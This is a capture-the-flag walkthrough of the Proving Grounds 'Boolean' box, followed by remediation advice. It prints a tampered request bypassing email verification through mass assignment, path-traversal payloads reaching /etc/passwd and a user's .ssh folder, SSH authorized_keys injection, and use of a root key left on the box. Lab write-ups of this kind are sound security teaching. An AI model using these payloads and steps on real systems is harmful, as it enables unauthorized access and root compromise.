Box Overview

Boolean is a Linux machine from Offensive Security’s Proving Grounds featuring parameter tampering for authentication bypass, local file inclusion, SSH key injection, and lateral movement to root via stored SSH keys.

Enumeration

Nmap Scan

nmap -sS -sC -A -T4 -oN first.scan -p- 192.168.229.231

Open Ports:

  • 22/tcp - SSH (OpenSSH 7.9p1 Debian)
  • 80/tcp - HTTP (Custom web application - “Boolean”)
  • 3000/tcp - Closed (ppp)
  • 33017/tcp - HTTP (Apache 2.4.38 - “Development”)

Web Enumeration

Port 80 - Boolean Application

Main application redirects to /login page.

Functionality discovered:

  • User registration
  • Email verification system
  • Login authentication
  • File manager (post-authentication)

Exploitation - Authentication Bypass

Registration Process Analysis

Account Creation

Registered test account:

Email: [email protected]
Username: testtest
Password: [chosen password]

Result: Account created but requires email verification.

Email Verification Issue

The application requires email confirmation, but no actual email is sent (development environment).

Challenge: Cannot verify account through normal means.

Burp Suite Interception

Request/Response Analysis

Captured registration response in Burp Suite:

{
  "email": "[email protected]",
  "id": 1,
  "username": "testtest",
  "confirmed": false,
  "created_at": "2024-05-29T16:57:36.528Z",
  "updated_at": "2024-05-29T17:16:59.443Z"
}

Key finding: "confirmed": false parameter controls account verification! 🎯

Parameter Tampering

Crafting Malicious Request

Endpoint: /settings/email
Method: POST (with _method=patch override)

Modified request:

POST /settings/email HTTP/1.1
Host: 192.168.229.231
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.229.231/register/confirmation
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yBpJBj2qhIFbw1f0rFWfAVnfQaMI7Not-J_7JF51iAeh0tg2n2VJU7rhWCnhzpY8LAviq0EIWyAgU1To1nTA3g
Content-Length: 184
Origin: http://192.168.229.231
Connection: close
Cookie: _boolean_session=qcLaZM8znvzo5CcwhRFQ7Fspvalu42bblnSQYc66GkLqYFMwrE2EJ2%2BpDtK4wli71VKG6fP7ATGCPs3nqA%2BgD8osVGmQaNmJ4DyvB67%2BJsYb4MVfarbm0eWTs3vkaCTUrRVmz5vJBI4C3Vvo%2BmtK1axEwV79w59me9OwEeam2LS2DJCi%2FD1VZtXjYz1jJGzNClDqRyDgmte4uaJ2f42cI9VL07o%2F%2F0Dd2PKUF4j4ZNUXOxpDQt7ycTmszLkO%2F%2F3YW1KGHazNSwfb1MBTITVxq1L0phvCHSWIIJWYAWX%2FWJahC87DuPOWbQ%3D%3D--v6gvZ6dxctCjnf4Q--EiDkxZf2yu0jOXwRcBqzoA%3D%3D

_method=patch&authenticity_token=yBpJBj2qhIFbw1f0rFWfAVnfQaMI7Not-J_7JF51iAeh0tg2n2VJU7rhWCnhzpY8LAviq0EIWyAgU1To1nTA3g&user%5Bconfirmed%5D=True&user%5Bemail%5D=test%40test.ru&commit=Change%20email

Critical parameter: user%5Bconfirmed%5D=True

URL decoded: user[confirmed]=True

Bypass Success

Request successfully tampered the confirmed status!

Authentication bypass achieved! ✅

Now able to log in without email verification.

Post-Authentication Exploitation

File Manager Discovery

After successful login, discovered /filemanager endpoint.

Functionality:

  • Browse server filesystem
  • Upload files
  • Download files
  • Navigate directories via URL parameter

Local File Inclusion (LFI)

Path Traversal

Vulnerable parameter: cwd (current working directory)

Test payload:

http://192.168.229.231/?cwd=../../../../../../../../etc/passwd

LFI confirmed! File system traversal possible.

SSH Key Discovery

Navigated to user home directory:

http://192.168.229.231/?cwd=../../../../../../../../home/remi/.ssh

Discovery: User remi has .ssh directory! 🎯

Contents visible:

  • authorized_keys file
  • Potentially other SSH keys

SSH Key Injection

Strategy

Upload our own SSH public key to remi’s authorized_keys file.

Key Generation

ssh-keygen -t rsa -f remi_key

Generated files:

  • remi_key - Private key
  • remi_key.pub - Public key

Key Upload

Prepare Authorized Keys

Rename public key:

cp remi_key.pub authorized_keys

Upload via File Manager

  1. Navigate to: http://192.168.229.231/?cwd=../../../../../../../../home/remi/.ssh
  2. Use file upload functionality
  3. Upload authorized_keys file
  4. Overwrites existing authorized_keys

SSH key injected! ✅

SSH Access

ssh -i remi_key [email protected]

Shell obtained as remi! ✅

remi@boolean:~$ whoami
remi

remi@boolean:~$ cat local.txt
[local flag]

User flag captured! ✅

Lateral Movement to Root

SSH Key Enumeration

Explored remi’s home directory:

remi@boolean:~$ cd .ssh
remi@boolean:~/.ssh$ ls -la
total 20
drwx------ 2 remi remi 4096 May 29 12:00 .
drwxr-xr-x 5 remi remi 4096 May 29 12:00 ..
-rw------- 1 remi remi  389 May 29 12:00 authorized_keys
drwxr-xr-x 2 remi remi 4096 May 29 12:00 keys

Interesting: keys subdirectory!

Keys Directory Investigation

remi@boolean:~/.ssh$ cd keys
remi@boolean:~/.ssh/keys$ ls -la
total 12
drwxr-xr-x 2 remi remi 4096 May 29 12:00 .
drwx------ 2 remi remi 4096 May 29 12:00 ..
-rw------- 1 remi remi 1679 May 29 12:00 root

Discovery: Private SSH key for root user! 🎯

Root Access

ssh -i /home/remi/.ssh/keys/root [email protected] -o IdentitiesOnly=yes

Parameters explained:

  • -i /home/remi/.ssh/keys/root - Use discovered root private key
  • [email protected] - Connect to localhost as root
  • -o IdentitiesOnly=yes - Only use specified identity file

Root shell obtained! 🎯

root@boolean:~# whoami
root

root@boolean:~# cat /root/proof.txt
[root flag]

Root flag captured - Pwned! ✅

Attack Chain Summary

  1. Web Enumeration → Found Boolean application with registration
  2. Account Creation → Registered account requiring email verification
  3. Burp Interception → Discovered confirmed parameter in JSON response
  4. Parameter Tampering → Modified user[confirmed]=True to bypass verification
  5. Authentication Bypass → Successfully logged in without email verification
  6. LFI Discovery → Found path traversal in file manager cwd parameter
  7. SSH Directory Enumeration → Navigated to /home/remi/.ssh
  8. SSH Key Generation → Created RSA keypair on attacker machine
  9. Key Injection → Uploaded public key as authorized_keys
  10. User Access → SSH’d as remi using injected key
  11. Key Discovery → Found root’s private SSH key in remi’s directory
  12. Root Access → Used discovered key for localhost root SSH
  13. System Compromise → Full root access achieved

Vulnerability Analysis

Parameter Tampering

Vulnerability Type: Insecure Direct Object Reference (IDOR) / Mass Assignment

Root Cause:

# Vulnerable code pattern (Ruby on Rails)
def update
  @user = User.find(params[:id])
  if @user.update(user_params)
    # Success
  end
end

private
def user_params
  params.require(:user).permit!  # Permits ALL parameters!
end

The Problem:

  • permit! allows mass assignment of ANY parameter
  • User can modify confirmed status directly
  • No server-side validation of privileged fields
  • Client-side restrictions easily bypassed

Exploitation:

user[email][email protected]&user[confirmed]=true

Local File Inclusion (LFI)

Vulnerable Code Pattern:

def browse
  directory = params[:cwd]
  files = Dir.entries(directory)  # No input validation!
  render json: files
end

Issues:

  1. No input validation on cwd parameter
  2. No path normalization - allows ../ traversal
  3. No access controls - can read any accessible file
  4. Excessive permissions - web app runs with file system access

Exploitation:

?cwd=../../../../../../../../etc/passwd
?cwd=../../../../../../../../home/remi/.ssh

SSH Key Management

Security Failures:

1. Writable Authorized Keys

# .ssh directory permissions allow web app to write
drwxrwxr-x 2 remi remi 4096 May 29 12:00 .ssh/
-rw-rw-r-- 1 remi remi  389 May 29 12:00 authorized_keys

Should be:

drwx------ 2 remi remi 4096 May 29 12:00 .ssh/
-rw------- 1 remi remi  389 May 29 12:00 authorized_keys

2. Root Key Accessible to User

# Root's private key stored in user directory!
-rw------- 1 remi remi 1679 May 29 12:00 /home/remi/.ssh/keys/root

Critical failure: Root private keys should NEVER be on user-accessible systems.

Remediation

Parameter Tampering Prevention

Strong Parameters (Rails)

def user_params
  # Explicitly whitelist allowed parameters
  params.require(:user).permit(:email, :username, :password)
  # NEVER include privileged fields like :confirmed, :admin, etc.
end

# Separate method for admin actions
def admin_params
  return unless current_user.admin?
  params.require(:user).permit(:confirmed, :role)
end

Server-Side Validation

before_action :require_confirmed_email, only: [:restricted_action]

def require_confirmed_email
  unless current_user.confirmed?
    redirect_to email_confirmation_path
  end
end

Actual Email Verification

# Generate cryptographically secure token
token = SecureRandom.urlsafe_base64(32)
user.update(confirmation_token: token)

# Send email with link
ConfirmationMailer.send_email(user, token).deliver_now

# Verify on callback
def confirm
  user = User.find_by(confirmation_token: params[:token])
  user.update(confirmed: true, confirmation_token: nil)
end

LFI Prevention

Input Validation

def browse
  requested_dir = params[:cwd]
  
  # Define allowed base directory
  base_dir = Rails.root.join('uploads', current_user.id.to_s)
  
  # Resolve and validate path
  safe_dir = Pathname.new(requested_dir).realpath
  
  unless safe_dir.to_s.start_with?(base_dir.to_s)
    return render json: { error: 'Access denied' }, status: :forbidden
  end
  
  files = Dir.entries(safe_dir)
  render json: files
end

Chroot Jail

# Restrict file manager to specific directory
chroot /var/www/uploads /usr/bin/filemanager

Web Application Firewall

# Nginx - Block path traversal
location / {
    if ($request_uri ~* "\.\.") {
        return 403;
    }
}

SSH Security Hardening

Correct Permissions

# User SSH directory
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys

# System-wide SSH config
/etc/ssh/sshd_config:
StrictModes yes  # Enforces permission checks

Key Management

# NEVER store root keys in user directories
# Use sudo/su for privilege escalation instead

# Rotate SSH keys regularly
ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519_$(date +%Y%m%d)

# Implement key certificate authority
ssh-keygen -s ca_key -I user_cert -n username -V +52w user_key.pub

Monitoring

# Monitor authorized_keys modifications
auditctl -w /home/*/.ssh/authorized_keys -p wa -k ssh_key_changes

# Alert on unauthorized SSH key additions
inotifywait -m -e modify /home/*/.ssh/authorized_keys

Application Security

Principle of Least Privilege

# Run web application as dedicated user
useradd -r -s /bin/false webapp

# Restrict file access
chown -R webapp:webapp /var/www/app
chmod 755 /var/www/app

Security Headers

# config/application.rb
config.action_dispatch.default_headers = {
  'X-Frame-Options' => 'SAMEORIGIN',
  'X-Content-Type-Options' => 'nosniff',
  'X-XSS-Protection' => '1; mode=block'
}

Tools Used

  • nmap
  • Burp Suite (parameter tampering)
  • ssh-keygen (key generation)
  • SSH client

Techniques

  • Web application enumeration
  • Parameter tampering / mass assignment
  • Authentication bypass
  • Local file inclusion (LFI)
  • SSH key injection
  • Lateral movement via credential reuse

Credits

Box Creator: Offensive Security
Platform: Proving Grounds Practice

“Sometimes the path to root is just a Boolean away from True.”